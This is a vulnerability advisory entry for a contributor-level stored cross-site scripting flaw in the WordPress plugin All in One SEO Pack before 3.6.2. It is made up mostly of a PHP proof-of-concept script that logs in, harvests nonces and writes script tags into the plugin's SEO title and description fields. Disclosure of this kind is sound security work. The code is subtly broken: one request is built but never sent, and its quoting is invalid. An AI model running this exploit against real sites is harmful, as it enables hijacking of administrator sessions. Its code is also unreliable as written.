WordPress Plugin Vulnerabilities
All in One SEO Pack < 3.6.2 - Authenticated Stored Cross-Site Scripting
Description
This flaw allowed authenticated users with contributor level access or above the ability to inject malicious scripts that would be executed if a victim accessed the wp-admin panel’s ‘all posts’ page.
Proof of Concept
<?php
//USAGE 'php poc.php https://mysite.com contributor password'
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
//Json Encode Our New Post
$data = array(
"Title" => "Exploit Post",
"content" => "<!-- wp:paragraph -->\n<p>Test2</p>\n<!-- /wp:paragraph -->",
"status"=>"pending");
$postdata = json_encode($data);
//Get Json post data length
$length = strlen($postdata);
// 1) Log in as contributor+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'log' => $wp_user,
'pwd' => $wp_pass,
'rememberme' => 'forever',
'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);
// Pull the Rest API Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
//Rest API Nonce
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];
//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
"X-WP-Nonce: $restnonce",
"Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
//Grab the page-id
preg_match('/"id":([^"]+),/', $content, $matches);
$pageid = $matches[1];
//Grab Some More Nonces
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post.php?post=' . $pageid . '&action=edit');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
//AIOSEO NONCE
preg_match('/nonce\-aioseop\-edit\'\stype\=\'hidden\'\s\svalue\=\'([^"]+)\'\s/', $content, $matches);
$seononce = $matches[1];
//GENERAL WPNONCE
preg_match('/\{\"id":.+\,\"nonce\":"([^"]+)"/', $content, $matches);
$wpnonce = $matches[1];
//EDIT THE POST WITH XSS!
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'_wpnonce' => $wpnonce,
'action' => 'editpost',
'post_ID' => $pageid,
'aiosp_edit' => '',
'nonce-aioseop-edit' => $seononce,
'aiosp_title' => '<script>alert('hello!')</script>',
'aiosp_description' => '</script><script>alert('hello!')</script>'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?> Affects Plugins
Fixed in version 3.6.2
References
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
No
Timeline
Publicly Published
2020-07-16 (about 2 years ago)
Added
2020-07-16 (about 2 years ago)
Last Updated
2021-01-02 (about 2 years ago)